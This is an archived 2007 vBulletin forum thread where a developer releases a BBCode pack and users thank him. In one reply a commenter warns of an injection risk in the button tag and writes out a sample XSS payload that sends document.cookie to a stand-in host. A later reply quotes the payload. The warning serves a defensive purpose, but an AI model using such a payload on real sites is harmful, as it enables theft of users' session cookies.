vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.6 Add-ons (https://vborg.vbsupport.ru/forumdisplay.php?f=194)
-   -   New Posting Features - ZH - BBCode Pack (https://vborg.vbsupport.ru/showthread.php?t=138641)

Ziki 02-05-2007 10:00 PM

ZH - BBCode Pack
 
This modification was brought to you by
KXDesign
http://www.kxdesign.com/


~Hack name
BBCode Pack

~Hack description
Here are some bbcodes for you.This will be update all the time so subscribe,click install or bookmark :p

~Hack options
  • Push button
  • Table
  • Textarea

~Hack info
File uploads: 0
File edits: 0
Templates: 0
Template edits: 0
Plugins: 0
SQL Queries: 0
Phrases: 0
Settings: 0
Hooks: 0

Install time: 3 mins
Install level: Easy

~Hack installation

Step 1: Open bbcode manager and choose the bbcodes in the zh_bbcodepack.txt file

Step 2: Add those bbcodes :)



~Hack screenshots
None


~Hack changelog
  • 1.0.0 - First release


~Hack copyright
This may not be distributed,released or claimed as your work without author's permission.

Ziki 02-06-2007 06:02 PM

~Reserved~

hotmasala4u 02-06-2007 06:09 PM

first one nice let me see

projectego 02-06-2007 07:23 PM

Nice little BBCode pack. Cheers! ;)

Ziki 02-06-2007 07:26 PM

Not nice yet.It will be updated soon but I'm just too lazy to finish it today :p

Reven 02-06-2007 07:59 PM

I don't know whether or not vBulletin cleans the {param} value, but it looks at first glance like anything can be injected into the HTML of the page through the first tag.

e.g. [button=" onmouseover="window.location.href='http://www.example.com/bad.php?cookies=' + document.cookie"]Click me so I can steal your cookies![/button] would make a button which, when focused on with the mouse, would redirect the user to a site which steals their cookies.

I may be wrong though...

Ziki 02-06-2007 08:04 PM

hm I don't really know but just to be sure you should edit the post :p

Atakan KOC 02-07-2007 06:03 AM

Nice Thanks... Installed...

https://vborg.vbsupport.ru/external/2007/02/22.jpg

YeşiLMeN 02-07-2007 06:42 AM

Good Job

Installed ;)

rjmjr69 02-07-2007 06:46 AM

Quote:

Originally Posted by Reven (Post 1176309)
I don't know whether or not vBulletin cleans the {param} value, but it looks at first glance like anything can be injected into the HTML of the page through the first tag.

e.g. [button=" onmouseover="window.location.href='http://www.example.com/bad.php?cookies=' + document.cookie"]Click me so I can steal your cookies![/button] would make a button which, when focused on with the mouse, would redirect the user to a site which steals their cookies.

I may be wrong though...

Would you please test your theory and let us know if things are out of line there? We deserve at least a warning and seeing how you brought it up I think you should be the one to test it......lol:)
I agree though the information should be edited until it can be confirmed maybe notify the coder and let him figure it all out.


All times are GMT. The time now is 05:13 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01154 seconds
  • Memory Usage 1,730KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete